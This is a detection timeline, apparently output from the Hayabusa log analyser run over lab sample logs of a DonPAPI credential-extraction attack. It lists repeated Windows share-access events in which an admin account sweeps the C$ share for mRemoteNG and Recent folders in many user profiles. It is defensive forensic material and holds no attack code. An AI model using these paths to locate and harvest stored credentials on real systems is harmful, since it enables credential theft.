+2021-12-12 07:16:04.998 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\AppData\Local\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:04.998 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\AppData\Roaming\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.013 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.013 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.013 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.013 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\AppData\Roaming\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.013 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Local\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.013 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Local\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.029 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.029 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.029 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.029 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Roaming\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.029 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Roaming\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.029 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\AppData\Local\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.045 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.045 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.045 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.045 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\AppData\Local\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.045 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\AppData\Roaming\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.045 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\AppData\Roaming\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.060 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.060 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.060 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.060 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\AppData\Local\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.060 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\AppData\Local\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.060 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\AppData\Roaming\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.060 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\AppData\Roaming\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.076 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.076 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.076 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.076 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\AppData\Local\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.076 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\AppData\Local\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.092 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.092 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.092 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.092 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\AppData\Roaming\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.092 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\AppData\Roaming\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.092 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\AppData\Local\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.107 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.107 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.107 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.107 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\AppData\Local\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.107 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\AppData\Roaming\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.107 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\AppData\Roaming\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.107 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\AppData\Local\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.124 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.124 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.124 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.124 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\AppData\Local\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.124 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\AppData\Roaming\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.124 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\AppData\Roaming\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.141 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.144 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.147 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.149 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.150 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.150 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.150 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.150 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.166 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.166 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.166 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.166 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.166 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Recent | IP Addr: 10.23.123.11 | LID: 